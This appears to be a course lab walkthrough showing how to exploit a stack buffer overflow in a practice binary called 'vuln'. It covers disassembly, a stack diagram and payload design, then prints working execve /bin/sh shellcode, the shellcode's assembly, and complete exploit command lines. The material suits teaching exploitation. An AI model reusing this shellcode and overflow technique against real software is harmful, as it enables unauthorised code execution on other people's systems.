18-330 Binary Exploitation Bootcamp

Our goal for this bootcamp is to spawn a shell by exploiting the vuln executable. We assume ASLR is disable and the stack is executable. Download vuln here.

Reversing

Just as with any other binary exploitation problem, I suggest running the program with different inputs just to get a feel of what the program is doing. After running vuln a couple of times, we might realize that the program doesn't output anything useful about the expected usage, so we can move on at this point.

We start by performing objdump -d vuln > vuln.asm. This dumps the program assembly into the vuln.asm file. Now we open vuln.asm to take a look at the main function, which we can find at address 0x4005ed. I'll copy the contents below:

00000000004005ed <main>:
  4005ed:   55                      push   %rbp
  4005ee:   48 89 e5                mov    %rsp,%rbp
  4005f1:   48 83 ec 50             sub    $0x50,%rsp
  4005f5:   89 7d bc                mov    %edi,-0x44(%rbp)
  4005f8:   48 89 75 b0             mov    %rsi,-0x50(%rbp)
  4005fc:   48 8b 45 b0             mov    -0x50(%rbp),%rax
  400600:   48 83 c0 08             add    $0x8,%rax
  400604:   48 8b 00                mov    (%rax),%rax
  400607:   48 8d 4d c0             lea    -0x40(%rbp),%rcx
  40060b:   48 8d 55 f8             lea    -0x8(%rbp),%rdx
  40060f:   be 10 07 40 00          mov    $0x400710,%esi
  400614:   48 89 c7                mov    %rax,%rdi
  400617:   b8 00 00 00 00          mov    $0x0,%eax
  40061c:   e8 cf fe ff ff          callq  4004f0 <__isoc99_sscanf@plt>
  400621:   89 45 fc                mov    %eax,-0x4(%rbp)
  400624:   83 7d fc 02             cmpl   $0x2,-0x4(%rbp)
  400628:   74 1b                   je     400645 <main+0x58>
  40062a:   8b 45 fc                mov    -0x4(%rbp),%eax
  40062d:   89 c6                   mov    %eax,%esi
  40062f:   bf 16 07 40 00          mov    $0x400716,%edi
  400634:   b8 00 00 00 00          mov    $0x0,%eax
  400639:   e8 82 fe ff ff          callq  4004c0 <printf@plt>
  40063e:   b8 ff ff ff ff          mov    $0xffffffff,%eax
  400643:   eb 2f                   jmp    400674 <main+0x87>
  400645:   eb 14                   jmp    40065b <main+0x6e>
  400647:   8b 45 f8                mov    -0x8(%rbp),%eax
  40064a:   89 c6                   mov    %eax,%esi
  40064c:   bf 30 07 40 00          mov    $0x400730,%edi
  400651:   b8 00 00 00 00          mov    $0x0,%eax
  400656:   e8 65 fe ff ff          callq  4004c0 <printf@plt>
  40065b:   8b 45 f8                mov    -0x8(%rbp),%eax
  40065e:   3d 94 3a 8f 49          cmp    $0x498f3a94,%eax
  400663:   75 e2                   jne    400647 <<main+0x5a>
  400665:   bf 54 07 40 00          mov    $0x400754,%edi
  40066a:   e8 41 fe ff ff          callq  4004b0 <puts@plt>
  40066f:   b8 00 00 00 00          mov    $0x0,%eax
  400674:   c9                      leaveq 
  400675:   c3                      retq

So right now the only functions we call are sscanf and printf. Recall that the first argument to a function is stored in the rdi/edi register. We can quickly see that right before the calls to printf, a constant value (string) is being stored into rdi. Since the constant string is unlikely to be user controlled, we can guess that this is not supposed to be a format string attack exploiting printf.

Since printf appears to be uninteresting to us, let's take a look at sscanf. Before our call to sscanf, we have a lot of stack manipulation, so this would be a good time to create a stack diagram.

This is what I came up with after tracing the assembly code line by line:
==================== stack grows down
  main return addr
-------------------- <- rbp + 0x8
     saved rbp
-------------------- <- rbp - 0x0
 sscanf return val
-------------------- <- rbp - 0x4
  integer variable
-------------------- <- rbp - 0x8

   string buffer

-------------------- <- rbp - 0x40
       argc
-------------------- <- rbp - 0x44
       argv
==================== <- rbp - 0x50

When rip is at 0x40061c (right about to call sscanf), rdi contains argv[1], rsi contains some constant string at 0x400710, rdx contains some 4-byte variable at rbp - 0x8, and rcx contains the pointer to a buffer at rbp - 0x40.

At this point, we can throw the program into gdb and break at 0x40061c. When we hit the breakpoint, we can print the string at 0x400710. Turns out this string is just "%d,%s". So, the line in assembly will look something like this:
uint32_t sscanf_return_value = sscanf(argv[1], "%d,%s", &integer_variable, &buffer);
Continuing with the assembly, we see that the program compares the return value of sscanf with 2. If the return value isn't 2, it will print the return value of sscanf and exit main.

Then the program checks if the integer_variable is equal to 0x498f3a94, which happens to be 1234123412 in decimal. If it is not equal, it enters an infinite while loop. Otherwise, the program prints something, returns from main, and exits normally.

The vulnerability in this program should be fairly clear: sscanf is copy from (user-controlled) argv[1] into a fixed-size buffer. Classic buffer overflow!

Designing the Payload

Since there isn't a convenient function in the program that spawns a shell for us, it would be easiest for us to write shellcode into our string buffer and then overwrite the main return address with the address of our buffer.

From our stack diagram, we can visualize the layout of our payload:
("5,") + (0x38 bytes of shellcode) + (1234123412) + (0xC bytes of padding) + (address of buffer)
You might ask yourself why we start with the number 5 instead of 1234123412. The answer is that sscanf writes into the supplies arguments from left to right. If we overflow the string buffer enough, then we will end up overwriting the integer variable at rbp - 0x8 anyways. As a result, it doesn't matter what we put as the first number, as long as it is a decimal number. The result is that we have to put 1234123412 into our string at the right location.

We can grab some shellcode online, such as this one, which has a 27-byte shellcode string. Since this is shorter than the 0x38 bytes we have allotted for shellcode, we can fill the front of the buffer with NOPs (\x90s).

Now we need to grab the address of the buffer. Recall that when sscanf is called, the rcx register contains the address of the buffer. We can use gdb to retrieve this address (break on sscanf, use p/x $rcx), which on my machine is 0x7fffffffdd50. This address will be different outside of gdb, but we can continue to test in gdb anyways and adjust this address later.

Now our command with the exploit string looks like this
gdb --args ./vuln $(python -c "print '5,' + '\x90' * 0x1D + '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' + '\x94\x3a\x8f\x49' + 'A' * 12 + '\x50\xdd\xff\xff\xff\x7f'")
When we run this it should work! But...

Debugging the Shellcode

We actually get a SIGILL (illegal instruction) with this. Time to debug!

Throwing it into GDB again, we get illegal instruction when rip is at 0x7fffffffdd81. This is clearly within our buffer, and we can step through the code in assembly to confirm that we got past all the NOPs. We execute the program normally until 0x7fffffffdd81 which is odd.

If we print the stack (x/30dx $rip in gdb) right before we get to the offending address, we see that 0x7fffffffdd81 is opcode 5e, which corresponds to pop rsi. This is clearly not an illegal instruction, since gdb is able to interpret the opcode. However, once we get to 0x7fffffffdd81, gdb now interprets the opcode as (bad).

At this point it seems like the stack is being modified as the shellcode executes. We confirm this by printing rsp, which is 0x7fffffffdd90. Additionally, the instruction right before the pop rsi is push rsp. The push instruction ends up modifying the next instruction to be executed, and it's clear that rsp is simply very unluckily placed.

The issue can be fixed by writing or modifying the shellcode. At this point, we can copy the assembly of the shellcode (found on the same site as before) into a new file shellcode.asm. Then at the start of the program, we can add sub rsp, 100 to move rsp. Our shellcode assembly now looks like this:
; shellcode.asm
main:
    sub rsp, 100 
    xor eax, eax 
    mov rbx, 0xFF978CD091969DD1
    neg rbx 
    push rbx 
    push rsp 
    pop rdi 
    cdq 
    push rdx 
    push rdi 
    push rsp 
    pop rsi 
    mov al, 0x3b
    syscall
We compile this: nasm -felf64 shellcode.asm and then we retrieve the opcodes using objdump: objdump -d shellcode.o. Our new shellcode ends up being this:
\x48\x83\xec\x64\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05
This is 4 bytes longer than the original opcode, so we compensate for that by shortening our NOP slide by 4 bytes. Now this is our final exploit string:
gdb --args ./vuln $(python -c "print '5,' + '\x90' * 0x19 + '\x48\x83\xec\x64\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' + '\x94\x3a\x8f\x49' + 'A' * 12 + '\x50\xdd\xff\xff\xff\x7f'")
Sure enough, it spawns a shell in gdb.

When running this outside of gdb, the buffer address will be different, so we can write a program to loop through return addresses that are near 0x7fffffffdd50 and run it until we get a shell. And that's it!

Summary

To sum up, it's easiest to solve these types of problems by drawing a stack diagram first, then identifying key points of the program that are most susceptible to attacks. Then we can craft a payload. In rare cases you might end up debugging a payload (though 18-330 assignments should be simple enough that this isn't really necessary).